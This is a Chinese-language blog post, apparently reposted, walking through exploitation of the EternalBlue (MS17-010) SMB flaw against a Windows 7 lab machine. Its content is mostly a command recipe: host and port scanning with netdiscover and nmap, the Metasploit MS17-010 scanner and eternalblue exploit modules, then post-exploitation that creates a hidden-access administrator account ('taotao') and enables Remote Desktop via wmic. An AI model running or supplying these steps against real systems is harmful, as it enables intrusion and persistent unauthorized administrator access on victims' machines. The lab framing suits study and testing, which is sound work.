2023年6月24日发(作者:)
永恒之蓝漏洞(445端⼝)详细利⽤过程永恒之蓝(445端⼝)完整利⽤过程 前⼏天有⼀次⽐赛的时候接触到了永恒之蓝漏洞,之前也没复现过永恒之蓝漏洞,在查资料⽅⾯花费了很多时间,就想着写篇博客记录⼀下。前置环境: kali,win7虚拟机,msf(kali⾃带)⼀ · 扫描⽹络中存活主机使⽤命令:netdiscover -i eth0 -r 192.168.1.1/24PS:由于这⾥使⽤的是虚拟机,所以⽹卡显⽰为 VMware⼆ · 扫描当前主机存活端⼝使⽤命令:nmap -sV -n 192.168.1.1三 · 开启MSF并利⽤搜索并检测是否能利⽤永恒之蓝开启MSF:msfconsole检测永恒之蓝是否能利⽤ :search ms17-010use auxiliary/scanner/smb/smb_ms17_010set RHOST 192.168.1.2经过检测可以发现永恒之蓝漏洞可以利⽤四 · 利⽤永恒之蓝漏洞use exploit/windows/smb/ms17_010_eternalblue剩下的命令不再做⽂本解释成功获得shell=================================================================so,获得shell之后应该做什么呢新建⼀个⽤户,以便下次访问。并将该⽤户升为管理员权限,这样就可以拥有更⼤的权限了新建⽤户并添加到管理员中net user taotao 123 /addnet localgroup administrators taotao /add查看是否成功操作net user 查看本地⽤户列表net localgroup administrators但是光有shell权限太不⽅便了,再开启⼀个3389⽅便远程连接远程连接之前需要判断对⽅⽤户在不在线开启远程桌⾯服务wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
发布者:admin,转转请注明出处:http://www.yc00.com/web/1687579146a21755.html
评论列表(0条)